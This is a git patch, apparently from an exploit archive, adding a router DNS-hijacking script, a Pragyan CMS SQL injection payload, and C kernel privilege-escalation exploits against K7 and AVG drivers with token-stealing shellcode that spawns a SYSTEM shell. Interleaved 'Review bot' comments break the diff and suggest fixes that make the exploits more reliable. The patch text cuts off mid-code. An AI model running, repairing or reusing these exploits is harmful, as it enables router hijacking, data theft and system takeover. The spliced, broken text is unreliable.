From d1471a4059a357e1834dc62d0918c9010697dd68 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 6 Feb 2015 08:37:15 +0000
Subject: [PATCH] Update: 2015-02-06 5 new exploits
---
 files.csv | 5 +
 platforms/hardware/remote/35995.sh | 90 ++++++++
 platforms/php/webapps/35991.txt | 74 +++++++
 platforms/windows/local/35992.c | 335 ++++++++++++++++++++++++++++
 platforms/windows/local/35993.c | 344 +++++++++++++++++++++++++++++
 platforms/windows/local/35994.c | 340 ++++++++++++++++++++++++++++
 6 files changed, 1188 insertions(+)
 create mode 100755 platforms/hardware/remote/35995.sh
 create mode 100755 platforms/php/webapps/35991.txt
 create mode 100755 platforms/windows/local/35992.c
 create mode 100755 platforms/windows/local/35993.c
 create mode 100755 platforms/windows/local/35994.c
diff --git a/files.csv b/files.csv
index ae31ae422..614648fc8 100755
--- a/files.csv
+++ b/files.csv
@@ -32435,3 +32435,8 @@ id,file,description,date,author,platform,type,port
 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0
 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0
+35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80
+35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0
diff --git a/platforms/hardware/remote/35995.sh b/platforms/hardware/remote/35995.sh
new file mode 100755
index 000000000..0f64ea370
--- /dev/null
+++ b/platforms/hardware/remote/35995.sh
@@ -0,0 +1,90 @@
+#!/bin/bash
+#
+# Shuttle Tech ADSL Modem-Router 915 WM
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2015 (c) Todor Donev
+# http://www.ethical-hacker.org/
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Warning:
+# My first public report on such a serious
+# vulnerability was ignored by the manufacturers
+# and were committed serious criminal deeds of
+# cybercriminals in Brasil. This vulnerability
+# could affect millions of users worldwide.
+# http://www.exploit-db.com/exploits/16275/
+# http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Shuttle Tech ADSL Modem-Router 915 WM"
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ================================================================"
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2015 (c) Todor Donev "
+ echo " http://www.ethical-hacker.org/"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/php/webapps/35991.txt b/platforms/php/webapps/35991.txt
new file mode 100755
index 000000000..8faa7fb09
--- /dev/null
+++ b/platforms/php/webapps/35991.txt
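Review bot: The redirection on the final `GET "http://$1/dnscfg.cgi?..."` line is malformed: bash has no `0&>` operator, so the `0` appears to be passed to GET as an extra argument and `<&1` ties stdin to stdout; `&>/dev/null` is presumably what was meant, and the line deserves a comment saying the HTTP response is discarded on purpose, because nothing in the script looks at what the device answered. The usage check at `if [[ $# -gt 3 || $# -lt 2 ]]` accepts two arguments, yet the URL always expands `$3`, so the two-argument form sends an empty `dnsSecondary=`; the usage text should state that. The `GET=\`which GET 2>/dev/null\`` assignment is used only for its exit status and the variable is never referenced afterwards, so the backtick capture can be dropped in favour of `which GET >/dev/null 2>&1`.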
@@ -0,0 +1,74 @@ +Advisory: SQL injection vulnerability in Pragyan CMS v.3.0 +Advisory ID: SROEADV-2015-11 +Author: Steffen Rösemann +Affected Software: Pragyan CMS v.3 +Vendor URL: https://github.com/delta/pragyan, http://delta.nitt.edu/ +Vendor Status: vendor did not respond after initial communication +CVE-ID: - + +========================== +Vulnerability Description: +========================== + +Pragyan CMS v. 3 suffers from a SQL injection vulnerability that can be +abused even by unauthenticated attackers. + +================== +Technical Details: +================== + +The user-profile of registered users of Pragyan CMS v.3 is vulnerable to +SQL injection attacks. A user-profile can be found in the following +location of a common Pragyan CMS installation: + +http://{TARGET}/user:1 + +Exploit-Example: + +http:// +{TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+ + + + +========= +Solution: +========= + +Vendor notified, did not respond after initial communication. + +If you use Pragyan CMS v.3, please locate the file userprofile.lib.php and +use my patch (see [5], usage at your own risk!). + + + + +==================== +Disclosure Timeline: +==================== +18-Jan-2015 – found the vulnerability +19-Jan-2015 - informed the developers (see [3]) +19-Jan-2015 – release date of this security advisory [without technical +details] +19-Jan-2015 - forked the project to keep it available/researchable in its +current state for other researchers [4] +03-Feb-2015 - release date of this security advisory +03-Feb-2015 - provided a patch for vulnerability (see [5]) +03-Feb-2015 - send to FullDisclosure + + + +======== +Credits: +======== + +Vulnerability found and advisory written by Steffen Rösemann. 
+ +=========== +References: +=========== + +[1] http://delta.nitt.edu/ / https://github.com/delta/pragyan +[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html +[3] https://github.com/delta/pragyan/issues/206 +[4] https://github.com/sroesemann/pragyan +[5] http://pastebin.com/ip2gGYuS \ No newline at end of file diff --git a/platforms/windows/local/35992.c b/platforms/windows/local/35992.c new file mode 100755 index 000000000..4f352bebc --- /dev/null +++ b/platforms/windows/local/35992.c 
@@ -0,0 +1,335 @@ +?/* + +Exploit Title - K7 Computing Multiple Products Arbitrary Write Privilege Escalation +Date - 04th February 2015 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://www.k7computing.co.uk/ +Tested Version - 14.2.0.240 +Driver Version - 12.8.0.104 - K7Sentry.sys +Tested on OS - 32bit Windows XP SP3 +OSVDB - http://www.osvdb.org/show/osvdb/113007 +CVE ID - CVE-2014-9643 +Vendor fix url - none +Fixed version - 14.2.0.253 +Fixed driver ver - 12.8.0.118 + +*/ + + +#include +#include + +#define INBUFSIZE 4 +#define BUFSIZE 4096 + + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + PVOID Unknown1; + PVOID Unknown2; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT NameLength; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemModuleInformation = 11, + SystemHandleInformation = 16 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + +typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( + DWORD ProfileSource, + PULONG Interval); + +typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +typedef void (*FUNCTPTR)(); + + + +// Windows XP SP3 + +#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct +#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct +#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define XP_APLINKS 0x88 // Offset to 
ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_xp[] = +{ + 0x52, // push edx Save edx on the stack + 0x53, // push ebx Save ebx on the stack + 0x33,0xc0, // xor eax, eax eax = 0 + 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax + 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN + 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX + 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX + 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x5b, // pop ebx Restores ebx + 0x5a, // pop edx Restores edx + 0xc2,0x08 // ret 8 Away from the kernel +}; + + + +DWORD HalDispatchTableAddress() +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD HalDispatchTable; + CHAR kFullName[256]; + PVOID kBase = NULL; + LPSTR kName; + HMODULE Kernel; + FUNCTPTR Hal; + ULONG len; + NTSTATUS status; + + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); + + if (!status) + { + printf("[-] An error occured while reading NtQuerySystemInformation. 
Status = 0x%08x\n\n", status); + return -1; + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); + + if(pModuleInfo == NULL) + { + printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); + + memset(kFullName, 0x00, sizeof(kFullName)); + strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); + kBase = pModuleInfo->Module[0].Base; + + printf("[i] Kernel base name %s\n", kFullName); + kName = strrchr(kFullName, '\\'); + + Kernel = LoadLibraryA(++kName); + + if(Kernel == NULL) + { + printf("[-] Failed to load kernel base\n\n"); + return -1; + } + + Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); + + if(Hal == NULL) + { + printf("[-] Failed to find HalDispatchTable\n\n"); + return -1; + } + + printf("[i] HalDispatchTable address 0x%08x\n", Hal); + printf("[i] Kernel handle 0x%08x\n", Kernel); + printf("[i] Kernel base address 0x%08x\n", kBase); + + HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); + + printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); + + if(!HalDispatchTable) + { + printf("[-] Failed to calculate HalDispatchTable\n\n"); + return -1; + } + + return HalDispatchTable; +} + + + +int GetWindowsVersion() +{ + int v = 0; + DWORD version = 0, minVersion = 0, majVersion = 0; + + version = GetVersion(); + + minVersion = (DWORD)(HIBYTE(LOWORD(version))); + majVersion = (DWORD)(LOBYTE(LOWORD(version))); + + if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; + if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; + if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; + + return v; +} + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + 
si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + +int main(int argc, char *argv[]) +{ + + _NtAllocateVirtualMemory NtAllocateVirtualMemory; + _NtQueryIntervalProfile NtQueryIntervalProfile; + BYTE *inbuffer; + NTSTATUS allocstatus; + LPVOID base_addr = (LPVOID)0x00000001; + DWORD size = BUFSIZE; + DWORD written; + int rwresult; + unsigned char buffer[BUFSIZE]; + HANDLE hDevice; + DWORD dwRetBytes = 0; + DWORD HalDispatchTableTarget; + ULONG time = 0; + unsigned char devhandle[MAX_PATH]; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" K7 Computing Multiple Products (K7Sentry.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on Windows XP SP3 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows XP\n"); + } + + if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not supported on this OS\n\n"); + return -1; + } + + sprintf(devhandle, "\\\\.\\%s", "K7Sentry"); + + NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) + { + printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); + return -1; + } + + NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); + + if (!NtAllocateVirtualMemory) + { + printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); + return -1; + } + + allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if (allocstatus) + { + printf("[-] An error occured while mapping 
executable memory. Status = 0x%08x\n", allocstatus); + printf("Error : %d\n", GetLastError()); + return -1; + } + printf("[+] NtAllocateVirtualMemory allocated memory at 0x%.8x\n", base_addr); + + memset(buffer, 0x90, BUFSIZE); + memcpy(buffer+0x00000005, token_steal_xp, sizeof(token_steal_xp)); + + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); + + rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); + + if (rwresult == 0) + { + printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); + return -1; + } + printf("[+] WriteProcessMemory %d bytes written\n", written); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memset(inbuffer, 0x41, INBUFSIZE); + + HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); + printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x95002570, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + printf("[+] Buffer sent\n"); + CloseHandle(hDevice); + + printf("[+] Spawning SYSTEM Shell\n"); + NtQueryIntervalProfile(2, &time); + spawnShell(); + + return 0; +} diff --git a/platforms/windows/local/35993.c b/platforms/windows/local/35993.c new file mode 100755 index 000000000..ff3b3ffa5 --- /dev/null +++ b/platforms/windows/local/35993.c 
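Review bot: The first line of the new file is `?/*` rather than `/*`, so as committed it does not compile; the stray byte looks like a UTF-8 BOM mangled in transit, and the two `#include` lines have lost their header names the same way, which should be repaired before this is relied on. The same first-line artefact is present in 35993.c and 35994.c. Separately, `HalDispatchTableAddress()` signals failure by returning -1 as a DWORD, but main uses it unchecked in `HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);`, so a failed lookup silently becomes a write at address 0x3 instead of an error exit; `DWORD hal = HalDispatchTableAddress(); if (hal == (DWORD)-1) return -1;` before that line would surface it (35993.c has the identical unchecked line). Minor: `devhandle` is declared `unsigned char[MAX_PATH]` but handed to `sprintf` and `CreateFile`, which take `char *`/`LPCSTR`, and `si.cb` is assigned twice in `spawnShell`.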
@@ -0,0 +1,344 @@ +?/* + +Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation +Date - 04th February 2015 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://www.avg.com/ +Tested Version - 2015.0.5315 +Driver Version - 15.0.0.5204 - avgtdix.sys +Tested on OS - 32bit Windows XP SP3 +OSVDB - http://www.osvdb.org/show/osvdb/113824 +CVE ID - CVE-2014-9632 +Vendor fix url - http://www.avg.com/eu-en/avg-release-notes +Fixed Version - 2015.0.5557 +Fixed driver ver - 15.0.0.5553 + + + +Note +---- +Overwritten HAL dispatch table after exploit + +kd> dps nt!HalDispatchTable l c +8054ccb8 00000003 +8054ccbc 00340000 +8054ccc0 8678d9a0 +8054ccc4 0a050002 +8054ccc8 6e66744e +8054cccc 001c0707 +8054ccd0 00000180 +8054ccd4 000001a4 +8054ccd8 867d6690 +8054ccdc 86706480 +8054cce0 00000000 +8054cce4 804e42d1 nt!ObpTraceDepth+0x19 + +10 pointers get overwritten. Since input buffer is in our control and pointers +are static in XP I've triggered the overwrite again restoring the pointers. 
+ +*/ + + +#include +#include + +#define BUFSIZE 4096 + + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + PVOID Unknown1; + PVOID Unknown2; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT NameLength; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemModuleInformation = 11, + SystemHandleInformation = 16 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + +typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( + DWORD ProfileSource, + PULONG Interval); + +typedef void (*FUNCTPTR)(); + + + +// Windows XP SP3 + +#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct +#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct +#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_xp[] = +{ + 0x52, // push edx Save edx on the stack + 0x53, // push ebx Save ebx on the stack + 0x33,0xc0, // xor eax, eax eax = 0 + 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax + 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN + 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX + 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX + 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x5b, // pop ebx Restores ebx + 0x5a, // pop edx Restores edx + 0xc2,0x08 // ret 8 Away from the kernel +}; + + + +BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable +"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation +"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation +"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots +"\x00\x00\x00\x00" // 8054ccc8 00000000 +"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR +"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters +"\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable +"\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation +"\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable +"\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews + + + +DWORD HalDispatchTableAddress() +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD HalDispatchTable; + CHAR kFullName[256]; + PVOID kBase = NULL; + LPSTR kName; + HMODULE Kernel; + FUNCTPTR Hal; + ULONG len; + NTSTATUS status; + + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); + + if (!status) + { + printf("[-] An error occured while reading NtQuerySystemInformation. 
Status = 0x%08x\n\n", status); + return -1; + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); + + if(pModuleInfo == NULL) + { + printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); + + memset(kFullName, 0x00, sizeof(kFullName)); + strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); + kBase = pModuleInfo->Module[0].Base; + + printf("[i] Kernel base name %s\n", kFullName); + kName = strrchr(kFullName, '\\'); + + Kernel = LoadLibraryA(++kName); + + if(Kernel == NULL) + { + printf("[-] Failed to load kernel base\n\n"); + return -1; + } + + Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); + + if(Hal == NULL) + { + printf("[-] Failed to find HalDispatchTable\n\n"); + return -1; + } + + printf("[i] HalDispatchTable address 0x%08x\n", Hal); + printf("[i] Kernel handle 0x%08x\n", Kernel); + printf("[i] Kernel base address 0x%08x\n", kBase); + + HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); + + printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); + + if(!HalDispatchTable) + { + printf("[-] Failed to calculate HalDispatchTable\n\n"); + return -1; + } + + return HalDispatchTable; +} + + +int GetWindowsVersion() +{ + int v = 0; + DWORD version = 0, minVersion = 0, majVersion = 0; + + version = GetVersion(); + + minVersion = (DWORD)(HIBYTE(LOWORD(version))); + majVersion = (DWORD)(LOBYTE(LOWORD(version))); + + if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; + if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; + if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; + + return v; +} + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + 
si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + + +int main(int argc, char *argv[]) +{ + + _NtQueryIntervalProfile NtQueryIntervalProfile; + LPVOID input[1] = {0}; + LPVOID addrtoshell; + HANDLE hDevice; + DWORD dwRetBytes = 0; + DWORD HalDispatchTableTarget; + ULONG time = 0; + unsigned char devhandle[MAX_PATH]; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on Windows XP SP3 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows XP\n"); + } + + if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not supported on this OS\n\n"); + return -1; + } + + sprintf(devhandle, "\\\\.\\%s", "avgtdi"); + + NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) + { + printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); + return -1; + } + + addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if(addrtoshell == NULL) + { + printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); + return -1; + } + printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); + + memset(addrtoshell, 0x90, BUFSIZE); + memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + 
